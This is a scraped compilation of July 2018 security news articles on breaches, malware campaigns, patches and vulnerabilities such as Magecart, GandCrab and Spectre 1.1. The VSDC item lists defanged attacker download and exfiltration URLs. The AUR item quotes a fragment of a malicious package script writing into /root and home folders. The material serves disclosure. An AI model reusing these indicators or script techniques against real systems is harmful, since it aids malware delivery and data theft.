"The concept of impact tolerance is core to the supervisory authorities' thinking," comments the paper, "and may challenge firms and FMIs to think differently. It encourages them to assume operational disruptions will occur. This means that attention can be directed towards minimizing the impact of disruption on important business services. Impact tolerance focuses firms, FMIs and the supervisory authorities on the potential vulnerabilities in business and operating models. The work they do to increase the resilience of these need not be tied to specific threats, rather an important business service should be made resilient to a wide variety of threats."
The paper highlights an unpalatable truth for consumers: in critical industries such as the financial sector, operational continuity is more important than data protection -- including PII. Concentrating resources on continuity could feasibly leave customer data more exposed to cyber-attack. Having PII stolen does not normally directly impinge on continuity, and could conceivably be considered of lesser importance (at least as far as the financial regulators are concerned).
The problem for individual firms within such critical industries is that any ensuing resilience regulations will not excuse them from existing data protection regulations. By treating resiliency as a separate issue to data protection, it merely complicates an already complicated regulatory environment.
Intel Patches Security Flaws in Processor Diagnostic Tool
12.7.2018 securityweek Vulnerebility
Intel has updated its Processor Diagnostic Tool to address vulnerabilities that could lead to arbitrary code execution and escalation of privileges.
The Intel Processor Diagnostic Tool (IPDT) is a piece of software designed to verify the functionality of an Intel processor. It can check for brand identification and operating frequency, test specific features, and perform a stress test on the processor.
The recently addressed vulnerabilities (two of which are tracked as CVE-2018-3667 and CVE-2018-3668) were found by Stephan Kanthak and affect the IPDT releases up to v188.8.131.52, Intel reveals.
Kanthak says he found a total of four vulnerabilities in the executable installers of Intel’s tool, three of which would lead to arbitrary code execution with escalation of privilege, and a fourth that could lead to denial of service.
The security flaws can be exploited in standard Windows installations where a user UAC-protected administrator account that is created during Windows setup is used, without elevation.
“This precondition holds for the majority of Windows installations: according to Microsoft's own security intelligence reports <https://www.microsoft.com/security/sir>, about 1/2 to 3/4 of the about 600 million Windows installations which send telemetry data have only ONE active user account,” Kanthak points out.
The issue is that the IPDT installer creates three files with improper permissions, thus opening the door to said vulnerabilities.
One issue was that the installer created a randomly named folder in the %TEMP% directory, copied itself into it, and then executed the copy. Because the folder and the copy inherit the NTFS access control list from %TEMP%, once execution of files from that directory is denied, the installer would fail to execute.
Another issue was that the copy of the executable self-extractor would run with administrative privileges, but the extracted payloads (the installers setup.exe and setup64.exe, and the batch script setup.bat) are dropped unprotected into the user's %TEMP% directory. The copy would also change directory to %TEMP% and execute the batch script %TEMP%\setup.bat.
“The extracted files inherit the NTFS ACLs from their parent %TEMP%, allowing ‘full access’ for the unprivileged (owning) user, who can replace/overwrite the files between their creation and execution. Since the files are executed with administrative privileges, this vulnerability results in arbitrary code execution with escalation of privilege,” the researcher notes.
Because setup.bat calls setup.exe and setup64.exe without a path, the command processor starts searching for the files via %PATH% as it does not find them in the current working directory.
In Windows Vista and newer, however, it is possible to remove the current working directory from the executable search path and an unprivileged user, who is in full control of %PATH%, can replace the two files with rogue ones in an arbitrary directory they add to %PATH%, which results in arbitrary code execution with escalation of privilege.
The researcher also discovered that the two setup executables also load multiple Windows system DLLs from their "application directory" in the %TEMP% folder, instead of using those in Windows' "system directory."
“An unprivileged attacker running in the same user account can copy rogue DLLs into %TEMP%; these are loaded and their DllMain() routine executed with administrative privileges, once more resulting in arbitrary code execution with escalation of privilege,” the researcher points out.
The issues were reported to Intel in May and the company updated the installer the same month, but information on the vulnerabilities was not released until last week. Intel Processor Diagnostic Tool v184.108.40.206 resolves all of the above issues.
Hackers Using Stolen D-Link Certificates for Malware Signing
12.7.2018 securityweek Virus
A cyber-espionage group is abusing code-signing certificates stolen from Taiwan-based companies for the distribution of their backdoor, ESET reports.
The group, referred to as BlackTech, appears highly skilled and focused on the East Asia region, particularly Taiwan. The certificates, stolen from D-Link and security company Changing Information Technology Inc., have been used to sign the Plead backdoor, ESET's security researchers say.
The Plead campaign is believed to have been active since at least 2012, often focused on confidential documents and mainly targeting Taiwanese government agencies and private organizations.
Evidence of the fact that the D-Link certificate was stolen comes from the fact that it was used to sign non-malicious D-Link software, not only the Plead malware, ESET explains.
After being informed on the misuse of its certificate, D-Link revoked it, along with a second certificate, on July 3. In an advisory, the company said that most of its customers should not be affected by the revocation.
“D-Link was victimized by a highly active cyber espionage group which has been using PLEAD Malware to steal confidential information from companies and organizations based in East Asia, particularly in Taiwan, Japan, and Hong Kong,” the company said.
Changing Information Technology Inc., also based in Taiwan, revoked the misused certificate on July 4, but the threat actor continued to use it for malicious purposes even after that date, ESET reveals.
The signed malware samples also contain junk code for obfuscation purposes, but all perform the same action: they either fetch from a remote server or open from the local disk encrypted shellcode designed to download the final Plead backdoor module.
The malware can steal passwords from major web browsers, such as Chrome, Firefox, and Internet Explorer, and from Microsoft Outlook.
According to Trend Micro, the Plead backdoor can also list drives, processes, open windows and files on the compromised machine, can open remote shell, upload files, execute applications via ShellExecute API, and delete files.
“Misusing digital certificates is one of the many ways cybercriminals try to mask their malicious intentions – as the stolen certificates let malware appear like legitimate applications, the malware has a greater chance of sneaking past security measures without raising suspicion,” ESET notes.
The use of code-signing certificates for malware delivery isn’t a novel practice, and the Stuxnet worm, which was discovered in 2010, is a great example of how long threat actors have been engaging in such practices. The first to target critical infrastructure, Stuxnet used digital certificates stolen from RealTek and JMicron, well-known Taiwanese tech companies.
New Attacks on Palestine Linked to 'Gaza Cybergang'
12.7.2018 securityweek APT
The Gaza Cybergang, an advanced persistent threat (APT) group linked to the Palestinian terrorist organization Hamas, apparently continues to target organizations in the Middle East, researchers at Check Point revealed last week.
The attacks observed by the security firm started with a spear-phishing email carrying a self-extracting archive that stored a Word document and a malicious executable. The emails purported to come from the Palestinian Political and National Guidance Commission and the documents contained copies of media reports from various Palestinian news websites.
While the targeted user is busy looking at the document, a piece of malware is being installed on their system. The malware, an upgraded variant of Micropsia, a tool previously linked to the Gaza Cybergang, is capable of taking screenshots, stealing documents, rebooting the system, obtaining information about the compromised device, and killing itself.
These and other capabilities are provided by more than a dozen modules, each named after characters in the American TV show “The Big Bang Theory” and a popular Turkish TV series called “Resurrection: Ertugrul.” In a related malware sample, the modules are named after various BMW car models (e.g. BMW_x1, BMW_x8).
The main target of this campaign, which Check Point has dubbed “Big Bang,” appears to be the Palestinian Authority, the governing body of the emerging Palestinian autonomous regions of the West Bank and Gaza Strip.
Researchers believe the latest attacks started in March and evidence suggests that they could be the work of the Gaza Cybergang, which has been known to target the Palestinian Authority many times in the past years.
“Although the group behind it seems to be focused on carefully selecting their victims, using a custom-made info-stealer for intelligence gathering operations, due to its very nature it is difficult to assert what the ultimate goal of this campaign is. Indeed, the next stages of the attack may even still be in the works, not yet deployed or only deployed to selected few victims,” Check Point researchers wrote in a blog post.
Also known as Gaza Hackers Team and Molerats, the threat actor has been active since at least 2012. Its targets include Israel, Egypt, Saudi Arabia, the UAE, Iraq, the United States, and some European countries.
The group has occasionally suspended activity after security firms exposed its operations, but it has continued improving tools and techniques and expanding its list of targets.
One of the most recent reports on Gaza Cybergang was published in October 2017 by Kaspersky Lab. The security firm reported at the time that the group had been targeting organizations in the Middle East and North Africa (MENA) region, including an oil and gas company from which the hackers stole information for more than a year.
Cisco Talos also published a report on Gaza Cybergang last year, detailing attacks aimed at Palestinian law enforcement.
Fitness App Revealed Data on Military, Intelligence Personnel
12.7.2018 securityweek BigBrothers
Mobile fitness app Polar has suspended its location tracking feature after security researchers found it had revealed sensitive data on military and intelligence personnel from 69 countries.
The revelation on the application from Finnish-based app Polar Flow comes months after another health app, Strava, was found to have showed potentially sensitive information about US and allied forces around the world.
Security researchers in the Netherlands said Sunday they were able to find data on some 6,000 individuals including military personnel from dozens of countries and employees of the FBI and National Security Agency.
The disclosure illustrates the potential security risks of using fitness apps which can track a person's location, and which may be "scraped" for espionage.
"With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning," security researcher Foeke Postma said in a blog post Sunday after an investigation with the Dutch news organization De Correspondent.
"We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer's identity."
The investigation found detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea, the researchers said.
Polar said in a statement it was suspending the app's feature that allowed users to share data, while noting that any data made public was the result of users who opted in to location tracking.
"It is important to understand that Polar has not leaked any data, and there has been no breach of private data," the statement said.
It said the location tracking feature "is used by thousands of athletes daily all over the world to share and celebrate amazing training sessions."
According to De Correspondent, only about two percent of Polar users chose to share their data, but that nonetheless allowed anyone to discover potentially sensitive data from military or civilian personnel.
"We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea," the report said.
In January, the Pentagon said it was reviewing its policies on military personnel use of fitness application after Strava's map showed a series of military bases in Iraq as well as sites in Afghanistan.
Two More Traders Convicted in Newswire Hacking Scheme
12.7.2018 securityweek Hacking
Two more individuals, a hedge fund manager and a securities trader, have been convicted by a U.S. court for their role in a $30 million scheme that involved hacking major newswire companies.
Vitaly Korchevsky, a 53-year-old former hedge fund manager from Pennsylvania, and Vladislav Khalupsky, a 47-year-old securities trader residing in New York and Ukraine, have been convicted in a Brooklyn federal court on charges of conspiracy to commit wire fraud, conspiracy to commit securities fraud and computer intrusion, conspiracy to commit money laundering, and securities fraud. They each face up to 20 years in prison for their crimes.
The scheme involved Ukraine-based hackers breaking into the systems of Marketwired, PR Newswire and Business Wire between February 2010 and August 2015, and stealing as many as 150,000 press releases. The hackers sent the stolen press releases containing nonpublic financial information to several traders who quickly monetized it.
Korchevsky and Khalupsky are said to have traded based on nonpublic press releases issued by hundreds of companies, including Align Technology, CA Technologies, Caterpillar, HP, Home Depot, Panera Bread, and Verisign.
According to authorities, Korchevsky made more than $15 million over the course of the scheme, while Khalupsky, who traded for the criminal network and received a percentage of the profits, made at least $500,000.
“The evidence at trial also demonstrated that the defendants went to great lengths to conceal their roles in the criminal scheme,” the Justice Department said. “The conspirators used separate phones, computers and hotspots to conduct their illegal trading activity, and routinely deleted emails and/or destroyed hardware that contained evidence of their crimes. The conspirators also directed that payments received for the illegal profits they generated for the criminal network be made to offshore shell companies.”
Korchevsky and Khalupsky were among nine individuals accused of making $30 million through the newswire hacking scheme. Three of the suspects are still at large, but all the others, including a Ukrainian national responsible for hacking into the newswire firms, have been convicted or pleaded guilty.
The scheme involved many people, not just the nine individuals charged by the Justice Department. A separate civil case filed by the U.S. Securities and Exchange Commission (SEC) names 34 people who allegedly made $100 million in unlawful profits through this operation.
Email Security Firm Mimecast Buys Staff Training Startup Ataata
12.7.2018 securityweek IT
London, UK-based email archiving and security firm Mimecast has acquired Bethesda, Md-based security training company Ataata. Financial terms of the acquisition have not been disclosed
Mimecast, founded by CEO Peter Bauer and CTO Neil Murray in 2003, offers a SaaS-based email platform providing email security and management. Ataata was founded in 2016 by CEO Michael Madon. It offers a continuous training platform that analyzes results and predicts which staff may be security risks.
Research by Mimecast and Vanson Bourne in May 2018 highlighted the extent to which humans are the targeted weakness in cybersecurity. From a pool of 800 IT decision makers and C-level executives, 94% had witnessed untargeted phishing attacks, 92% had witnessed spear-phishing attacks, 87% had witnessed financially-based email impersonation attacks (BEC), and 40% had seen an increase in trusted third-party impersonation attacks.
Mimecast LogoDespite this, only 11% of the respondents claimed to use continuous staff training to help employees detect and respond to such email attacks. "Cybersecurity awareness training has traditionally been viewed as a check the box action for compliance purposes, boring videos with PhDs rambling about security or even less than effective gamification which just doesn't work," commented Bauer.
"As cyberattacks continue to find new ways to bypass traditional threat detection methods, it's essential to educate your employees in a way that changes behavior," he continued. "According to a report from Gartner, the security awareness computer-based training market will grow to more than $1.1 billion by year-end 2020. The powerful combination of Mimecast's cyber resilience for email capabilities paired with Ataata's employee training and risk scoring will help customers enhance their cyber resilience efforts."
Ataata brings humor to staff training. "Every module is drafted by professional television comedy writers who understand the reality of security in the enterprise," it explains. "Yes, such people exist. We hired 'em. So our content is funny, deeply knowing about the contemporary workplace and driven by characters your employees will recognize all too well." Ataata was founded on the principle that training should not be a compliance tool imposed by management, but a commitment enjoyed by staff.
Human error is involved in the majority of all security breaches, and casual mistakes can cost organizations money, their reputation -- and employees, potentially their job. "Organizations need to understand that employees are their last line of defense," says Madon. "Cybersecurity training and awareness doesn't need to be difficult or boring. Training and awareness is needed to help mitigate these internal risks. Our customers rely on engaging content at the human level, which helps to change behavior at the employee-level. We're excited to join forces with Mimecast to help customers build a stronger cyber resilience strategy that includes robust content, risk scoring and real-world attack simulation -- going way beyond basic security awareness capabilities."
Mimecast told SecurityWeek that teams from both firms will be working to integrate the products "to create the most advanced, sophisticated and effective cyber awareness training product on the market." Over time, the two platforms will become more tightly integrated, but, says Mimecast, "the offering is immediately relevant and valuable to all of Mimecast's target audiences."
Ataata has not operated from a central office. Existing staff will be maintained as employees of Mimecast, and remain based where they currently live -- with the exception of Madon. Madon, Mimecast told SecurityWeek, will relocate to Boston, where he "will now be leading up the newly established Mimecast Learning Labs, a training and certification program for Mimecast customers looking to achieve role-based excellence around security best practices."
Mimecast went public in late 2015 at $10 per share, raising $78 million in gross proceeds. After the IPO, share value fell as low as $6.20 in January 2016. Since July 2016, however, share price has risen steadily to $42.99 at the time of writing. Ataata raised $3 million in a Series A funding round in December 2017.
Apple Rolls-Out USB Restricted Mode in iOS
12.7.2018 securityweek Apple
Apple on Monday released patches for various security vulnerabilities in iOS, macOS, tvOS, watchOS, and Safari, as well as for iCloud and iTunes for Windows.
In addition to fixes for 22 issues, the iOS 11.4.1 software update also introduces the long expected USB Restricted Mode, a feature that should boost the security of its platform and improve privacy.
“Starting with iOS 11.4.1, if you use USB accessories with your iPhone, iPad, or iPod touch, or if you connect your device to a Mac or PC, you might need to unlock your device for it to recognize and use the accessory. Your accessory then remains connected, even if your device is subsequently locked,” Apple says.
The new feature should prevent the use of USB devices that connect over the Lightning port to crack the device’s passcode and access user data, should the connection attempt occur one hour after the device was locked.
The new feature can be found in Settings > Face ID (or Touch ID) & Passcode > USB Accessories. Users should leave the toggle disabled to take advantage of USB Restricted Mode.
With the roll-out of this new capability on iOS, it would be more difficult for forensics analysis to access data on a suspect’s devices, as they would only have a one-hour window at their disposal to attempt to crack the available protections.
Once it has kicked in, USB Restricted Mode persists through reboots and even if the device software has been restored via Recovery mode, ElcomSoft’s Oleg Afonin explains.
However, it is possible to reset the USB Restrictive Mode countdown timer if an untrusted USB accessory is connected to the device within the first hour.
The 22 vulnerabilities addressed with the release of iOS 11.4.1 impact CFNetwork, Emoji, Kernel, libxpc, LinkPresentation, WebKit, WebKit Page Loading, and Wi-Fi. WebKit was impacted the most, with 14 vulnerabilities addressed in it.
The addressed issues include unexpected persistence of cookies in Safari, denial of service, elevation of privileges, access to restricted memory, address bar spoofing, arbitrary code execution, unexpected Safari crashes, exfiltration of audio data cross-origin, and sandbox escape.
The new iOS release is available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation.
Apple also patched 11 security flaws with the release of macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, Security Update 2018-004 El Capitan. The bugs impact AMD, APFS, ATS, CFNetwork, CoreCrypto, DesktopServices, IOGraphics, Kernel, libxpc, and LinkPresentation.
The most important of the issues is CVE-2018-3665, a vulnerability that impacts Intel processors. Dubbed LazyFP and detailed last month, the bug is similar to Meltdown Variant 3a and could be exploited to access floating point unit (FPU) state data, which can contain sensitive information, such as cryptographic keys.
“Systems using Intel Core-based microprocessors may potentially allow a local process to infer data utilizing Lazy FP state restore from another process through a speculative execution side channel,” Apple notes.
The newly released watchOS 4.3.2 resolves a total of 14 vulnerabilities, while tvOS 11.4.1 addresses 18. Apple resolved 16 flaws with the release of Safari 11.1.2, and patched 14 bugs in both iCloud for Windows 7.6 and iTunes 12.8 for Windows.
GandCrab Ransomware Spreads Via NSA Exploit
12.7.2018 securityweek Ransomware
GandCrab, a ransomware family that has received numerous updates in recent months, is now attempting to infect Windows XP machines using the NSA-linked EternalBlue exploit.
The malware is usually spreading via spam emails, but GandCrab 4, which first emerged earlier this month, is being distributed via compromised websites, Fortinet says. The malware now appends the .KRAB extension to the encrypted files.
The new variant also includes an overhaul in terms of code structure, has switched to the Salsa20 stream cipher for data encryption, and also removed some of the older features. More importantly, it no longer requires command and control (C&C) communication to encrypt files.
“For this latest release, we have found numerous infected websites injected with malicious pages. These pages instantly redirect users to a separate page containing the actual download link leading to the GandCrab executable,” Fortinet explains.
Both the malware executable and the download links are being updated regularly, the security researchers say. In fact, within days after version 4 emerged, the ransomware authors released GandCrab 4.1, which has already showed signs of network communication.
More importantly, as security researcher Kevin Beaumont has discovered, the ransomware is also attempting to spread through the National Security Agency’s EternalBlue SMB exploit.
The most interesting aspect of this new capability is the fact that Windows XP and Windows Server 2003 systems too are targeted, along with modern operating systems.
The EternalBlue exploit targets a security bug in Windows’ Server Message Block (SMB) on port 445.The flaws, however, only impact older operating system versions, mainly Windows XP and Windows 7.
The exploit wasn’t previously working on Windows XP out of the box, but that did not prevent ransomware such as WannaCry to attempt to spread using it. In fact, numerous malware families have been abusing the exploit to date, including the NotPetya wiper.
Microsoft patched the vulnerability that EternalBlue targets before the exploit became public, and even pushed an emergency patch for Windows XP to keep users safe from WannaCry.
Thus, as Beaumont points out, the best defense against GandCrab and any malware spreading via EternalBlue is to apply the available patch for all operating systems, including the older Windows XP and Windows Server 2003.
“Many antivirus products have dropped support for Windows XP and 2003, which makes this problematic. You probably want to make sure staff know not to download things from BitTorrent, install unknown software, run keygens, access random USB sticks etc.,” Beaumont notes.
Ticketmaster Breach: Tip of the Iceberg in Major Ongoing Magecart Attacks
12.7.2018 securityweek Attack
In June 2018, Ticketmaster UK warned that some of its customers -- which it put at less than 5% of its global customer base -- may have had their payment information accessed by an unknown third-party. Ticketmaster laid the blame on third-party provider Inbenta, who laid the blame on Ticketmaster, who in turn had been warned by online bank Monzo in April that they might have been breached. Clearly, there was more to this story than was being told at the time.
RiskIQ researchers Yonathan Klijnsma and Jordan Herman have now filled in some of the gaps. An analysis of the events suggests that the breach was bigger and over a longer period than previously thought -- but it is only one part of a much larger and ongoing campaign to steal users' payment details. The researchers go further -- naming the unknown third-party culprit as the Magecart actors.
RiskIQ has been monitoring Magecart since 2015, and produced a report in 2016. Magecart uses a form of virtual card skimming, scraping payment details during online transactions and sending the card details to the criminals. Originally, the Magecart actors hacked retail stores directly. Now it seems to have evolved to breaching the suppliers of widely used third-party components.
This is what seems to have happened with Ticketmaster UK and Inbenta. Inbenta code was compromised with the addition of Magecart skimming software. "Inbenta explained that the module was custom built for Ticketmaster," write the researchers. "To modify the source of this module, the attackers would have needed access to Inbenta's systems in some way or form. We believe that Inbenta was breached, but there another possibility a Ticketmaster developer account was breached to access Inbenta. Unless the companies provide more transparency into the event, we will never know."
Ticketmaster UK has said that the Inbenta breach led to subsequent 'breaches' at their Ticketmaster International, Ticketmaster UK, GETMEIN!, and TicketWeb websites. RiskIQ research say this list should include at least Ticketmaster New Zealand and Ticketmaster Ireland as well; and adds that Ticketmaster Germany, Ticketmaster Australia, and Ticketmaster International were compromised by Magecart via a different third-party supplier of functionality -- in this case SociaPlus.
The Magecart campaign spreads far beyond just Ticketmaster and Inbenta and SociaPlus. "While Ticketmaster received the publicity and attention, the Magecart problem extends well beyond Ticketmaster," said Klijnsma. "We believe it's cause for far greater concern -- Magecart is bigger than any other credit card breach to date and isn't stopping any day soon."
The report highlights three other major component suppliers that it claims are currently breached by Magecart. The first, PushAssist, provides web analytics similar to Google Analytics. "Their server has been breached and is still serving analytics with the Magecart skimmer. The service boasts having over 10 thousand websites using its analytics platform... This means any website performing payment processing on their website that uses PushAssist is, right now, within reach of the Magecart skimmer."
The second is Clarity Connect, which provides a CMS for company owners to create an online presence with a website or web store. The Magecart actors have even left a message in the compromised code: 'If you will delete my code one more time I will encrypt all your sites: you very bad admins.' It seems, suggest the researchers, "the Magecart actors have broad access that they aren't afraid to use if the administrator removes their skimmer again. Clarity Connect's customers are affected by this injected skimmer code."
The third example is Annex Cloud, another analytics provider currently compromised by Magecart -- and again it appears as if the actors have broad access to the Annex Cloud servers.
"It appears that Magecart was able to access hundreds of other high-profile ecommerce sites during its credit card skimming campaign, which means the scale of this breach looks set to be unprecedented," comments Ross Brewer, VP & MD EMEA at LogRhythm. He notes that like many other hackers, the Magecart actors have switched their attention to the supply chain. They are, he says, "redirecting their attention to smaller, third party suppliers that can act as a gateway to more lucrative targets. As the saying goes, you're only as strong as your weakest link, which means if one of your third-party partners doesn't have the same commitment to data protection, any tools you have in place are essentially rendered useless."
Magecart, warn the RiskIQ researchers, "is an active threat that operates at a scale and breadth that rivals -- or possibly surpasses -- the recent compromises of point-of-sale systems of retail giants such as Home Depot and Target. The Magecart actors have been active since 2015 and have never retreated from their chosen criminal activity. Instead, they have continually refined their tactics and targets to maximize the return on their efforts."
San Francisco, Calif-based RiskIQ raised $30.5 million in a Series C funding round led by Georgian Partners in November 2016. This brought the total funding raised by the firm to $65.5 million.
Popular software VSDC official website was hacked and used to distribute malware
12.7.2018 securityaffairs Virus
Hackers have compromised the website of VSDC, (http://www.videosoftdev.com), a popular company that provides free audio and video conversion and editing software.
Experts from Chinese security firm Qihoo 360 Total Security discovered that attackers hijacked the download links of the popular audio and video editor, VSDC.
The experts discovered that hackers hijacked download links on the websites in three different periods, the links were pointing to servers they were operating.
The attackers gained access to the administrative server part of the site and replaced the links to the distribution file of the program.
The experts discovered that attacks were registered from an IP address in Lithuania – 185[.]25.51.133.
“360 Security Center discovered the download links of a famous audio and video editor, VSDC (http://www.videosoftdev.com), has been hijacked in official website. The computer will be injected by theft Trojan, keylogger and remote control Trojan after the program is downloaded and installed.” reads the analysis published by Qihoo 360 Total Security.
Below the details of the three different attacks:
June 18 – Hackers substituted download links with hxxp://220.127.116.11/_files/file.php
July 2 – Hackers substituted download links with hxxp://drbillbailey.us/tw/file.php
July 6 – Hackers substituted download links with hxxp://drbillbailey.us/tw/file.php
VSDC confirmed the incident and fixed the links on its website.
The first and third periods affected the most users that were infected with three different pieces of malware.
The infostealer hijacks sensitive information including Telegram account / password, Steam account / password, Skype chat log, Electrum wallet and screenshot from victims’ machine. Data are sent back to hxxp://system-check.xyz/index.php.
The keylogger records all keyboard actions and sends the record to hxxp://wqaz.site/log/index.php.
The third file is a Hidden VNC remote control Trojan that could be used by attackers to control the infected PC.
The security researcher Ivan Korolev from Dr.Web revealed that the third file is a version of DarkVNC, a lesser known RAT.
Popular Software Site Hacked to Redirect Users to Keylogger, Infostealer, More - by @campuscodihttps://www.bleepingcomputer.com/news/security/popular-software-site-hacked-to-redirect-users-to-keylogger-infostealer-more/ …
The third trojan that is screenshoted by Qihoo is DarkVNC, not a TVRAT or SpyAgent. However, they might have replaced the file before it was analyzed by @malwrhunterteam
9:05 AM - Jul 12, 2018
See Ivan Korolev's other Tweets
Twitter Ads info and privacy
“This domain name hijacking is a global attack and has affected more than thirty countries. It is more likely to be a Supply Chain Attack instead of a local network hijacking.” continues the analysis.
“On behalf of VSDC team we’d like to inform our users that the attacks have been stopped and all the vulnerabilities detected and removed”
1. All the source files of the site have been restored, the fake ones have been deleted.
All the passwords have been changed. As our practice has shown, 10-12 character passwords made of random characters are not complex enough, so they have their length significantly increased.
2. Two-level authentication of access to the administrative part at the IIS server level was introduced.
3. On the server currently there is a utility that checks all files for validity.
A tainted version of Arch Linux PDF reader package found in a user-provided AUR
12.7.2018 securityaffairs Hacking
Hackers have poisoned the Arch Linux PDF reader package named “acroread” that was found in a user-provided Arch User Repository (AUR),
Hackers have poisoned the Arch Linux PDF reader package, this means that users who have downloaded recently a PDF viewer named “acroread” may have been compromised.
ThePDF reader package has been tainted with a malware and Arch Linux has removed the user-provided AUR (Arch User Repository).
This incident raises the discussion about the installation of software from untrusted sources and the possibility that threat actors poison the supply chain.
The specific user repository had been abandoned by its maintainer leaving open the doors for a threat actor.
Someone using the handle “xeactor” modified the package by adding a downloader script that loads a malicious code hosted on a server maintained by the attackers.
The maintainer Eli Schwartz quickly reverted the commits after discovering the hack, it also suspended the account of xeactor.
“The acroread AUR package appears to have been compromised: look at https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id= b3fec9f2f16703c2dae9e793f75ad6e0d98509bc (and in particular that curl|bash line!). Not exactly sure who to contact, but I assume someone on this list can get things sorted out.” wrote Schwartz.
“Account suspended, commit reverted using Trusted User privileges.”
Schwartz also discovered two other packages that were tainted with a similar technique, both have been removed.
The user Bennett Piater wrote in the Arch Linux mailing that he noticed a suspect script that creates ‘compromised.txt’ in the root and all home folders.”
“Looks to me like this is more of a warning than anything else, no? Why would he create those files otherwise, given how much attention that would attract?” Piater said.
for x in /root /home/*; do
if [[ -w "$x/compromised.txt" ]]; then
echo "$FULL_LOG" > "$x/compromised.txt"
The acroread was used by attackers as a dropper and the script would set the systemd to restart on a regular basis, a circumstance confirmed by Schwartz too.
“Side note on the acroread pastes: https://ptpb.pw/~xwas executed by the PKGBUILD, which in turn executed https://ptpb.pw/~u. But the thing it installed declares an ssupload()function then tries to execute the contents of $uploader to actually upload the data collection.” wrote Schwartz.
Arch Linux PDF reader package
The good news is that the malicious software could not work.
Arch maintainer Giancarlo Razzolini tried to downplay the problem explaining the usage of AUR clearly could expose users at risk, but it is their choice.
“This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk? This thread is attracting way more attention than warranted. I’m surprised that this type of silly package takeover and malware introduction doesn’t happen more often.” wrote Razzolini.
“This is why we insist users always download the PKGBUILD from the AUR, inspect it and build it themselves. Helpers that do everything automatically and users that don’t pay attention, *will* have issues. You should use helpers even more so at your risk than the AUR itself.”
Hacker offered for sale US Military Reaper Drone documents for $200
12.7.2018 securityaffairs CyberCrime
Researchers at threat intelligence firm Recorded Future have reported that a hacker was trying to sell US Military Reaper drone documents for less than $200.
The news is disconcerting, the hackers may have obtained the documents related to the Reaper drone by hacking into at least two computers belonging to U.S. military personnel.
“Specifically, an English-speaking hacker claimed to have access to export-controlled documents pertaining to the MQ-9 Reaper unmanned aerial vehicle (UAV). Insikt analysts engaged the hacker and confirmed the validity of the compromised documents.” reads the analysis published by Recorded Future.
“Insikt Group identified the name and country of residence of an actor associated with a group we believe to be responsible.”
Experts from Recorded Future contacted the hacker that explained to them that had obtained the documents by exploiting a vulnerability in Netgear routers that was known since 2016.
The hacker used the Shodan search engine to discover vulnerable devices online and targeted them with the available exploit, evidently one of them gave the attacker the access to the precious documents.
The compromised Netgear router was located at Reaper station at the Creech Air Force Base in Nevada and it was simple for the hacker to compromise it.
The hacker stole Reaper maintenance course books and a list of airmen assigned to controlling the drone.
“Utilizing the above-mentioned method, the hacker first infiltrated the computer of a captain at 432d Aircraft Maintenance Squadron Reaper AMU OIC, stationed at the Creech AFB in Nevada, and stole a cache of sensitive documents, including Reaper maintenance course books and the list of airmen assigned to Reaper AMU.” states Recorded Future.
“While such course books are not classified materials on their own, in unfriendly hands, they could provide an adversary the ability to assess technical capabilities and weaknesses in one of the most technologically advanced aircrafts.”
The hacker also offered for sale a dozen training manuals describing improvised explosive device defeat tactics, how to operate an M1 Abrams tank, a file on tank platoon tactics, and crewman training and survival manual.
Though Recorded Future couldn’t elicit the source of those docs from the hacker, the company said it appeared the files had been taken from a U.S. Army staffer.
The documents weren’t classified, but Recorded Future pointed out that their content was highly sensitive and could be abused by various threat actors, including terrorist organizations.
Recorder Future reported its discovery to the DHS in mid-June that started an internal investigation.
“We will not comment on documents that were allegedly stolen, and cannot verify.” a said a Department of Defense spokesperson.
If the source of the documents is confirmed, this incident raises the discussion about the lack of security on military personnel computers.
“Maybe government agencies should start looking into their own policies,” concludes Recorded Future researcher Andrei Bareseyvich. “Right now it seems to be a bigger problem than we had anticipated.”
Intel pays a $100K bug bounty for the new CPU Spectre 1.1 flaw
12.7.2018 securityaffairs Security
A team of researchers has discovered new variant of the famous Spectre attack (Spectre 1.1), and Intel has paid a $100,000 bug bounty as part of its bug bounty program.
Intel has paid out a $100,000 bug bounty for new vulnerabilities that are related to the first variant of the Spectre attack (CVE-2017-5753), for this reason, they have been tracked as Spectre 1.1 (CVE-2018-3693) and Spectre 1.2.
Intel credited Kiriansky and Waldspurger for the vulnerabilities to Intel and paid out $100,000 to Kiriansky via the bug bounty program on HackerOne.
Early 2018, researchers from Google Project Zero disclosed details of both Spectre Variants 1 and 2 (CVE-2017-5753 and CVE-2017-5715) and Meltdown (CVE-2017-5754).
Both attacks leverage the “speculative execution” technique used by most modern CPUs to optimize performance.
The team of experts composed of Vladimir Kiriansky of MIT and Carl Waldspurger of Carl Waldspurger Consulting discovered two new variants of Spectre Variant 1.
Back to the present, the Spectre 1.1 issue is a bounds-check bypass store flaw that could be exploited by attackers to trigger speculative buffer overflows and execute arbitrary code on the vulnerable processor.
This code could potentially be exploited to exfiltrate sensitive data from the CPU memory, including passwords and cryptographic keys.
“We introduce Spectre1.1, a new Spectre-v1 variant that leverages speculative stores to create speculative buffer overflows. Much like classic buffer overflows, speculative out-ofbounds stores can modify data and code pointers. Data-value attacks can bypass some Spectre-v1 mitigations, either directly or by redirecting control flow.” reads the research paper.
“Control-flow attacks enable arbitrary speculative code execution, which can bypass
fence instructions and all other software mitigations for previous speculative-execution attacks.”
The second sub-variant discovered by the experts, called Spectre1.2 is a read-only protection bypass
It depends on lazy PTE enforcement that is the same mechanism exploited for the original Meltdown attack.
Also in this case, the issue could be exploited by an attacker to bypass the Read/Write PTE flags and write code directly in read-only data memory, code metadata, and code pointers to avoid sandboxes.
